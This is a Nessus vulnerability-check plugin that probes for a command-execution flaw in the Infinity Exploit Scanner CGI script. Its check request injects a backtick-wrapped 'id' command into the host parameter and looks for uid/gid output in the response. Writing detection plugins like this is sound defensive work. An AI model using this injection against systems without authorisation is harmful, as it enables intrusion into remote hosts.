#
# This script is (C) Tenable Network Security
#


 desc = "
The remote is running Infinity Exploit Scanner, a web-based CGI vulnerability
scanner implemented in perl and stored under the name 'nph-exploitscanget.cgi'.

There is a flaw in this CGI which lets an attacker execute arbitrary
commands on this host.

In addition to this, there is a flaw in this CGI which may allow an attacker
to use this CGI to scan third-party hosts by bypassing the policy set by
the administrator of this CGI. This CGI is also vulnerable to 
cross-site scripting issues.

Solution : Upgrade to the latest version
Risk factor : High";


if(description)
{
 script_id(11740);
 script_bugtraq_id(7910, 7911, 7913);
 script_version ("$Revision: 1.9 $");

 name["english"] = "Infinity CGI Exploit Scanner";

 script_name(english:name["english"]);
 
 script_description(english:desc);
 
 summary["english"] = "Checks for the presence of nph-exploitscanget.cgi";
 
 script_summary(english:summary["english"]);
 
 script_category(ACT_ATTACK);
 
 
 script_copyright(english:"This script is Copyright (C) 2003 Tenable Network Security");
 family["english"] = "CGI abuses : XSS";
 script_family(english:family["english"]);
 script_dependencie("http_version.nasl");
 script_require_ports("Services/www", 80);
 exit(0);
}

#
# The script code starts here
#


include("http_func.inc");
include("http_keepalive.inc");

port = get_http_port(default:80);
if(!get_port_state(port))exit(0);

http_check_remote_code (
			check_request:string("/nph-exploitscanget.cgi?host=`id`&port=", port, "&errchk=0&idsbypass=0"),
			check_result:"uid=[0-9]+.*gid=[0-9]+.*",
			command:"id",
			description:desc
			);
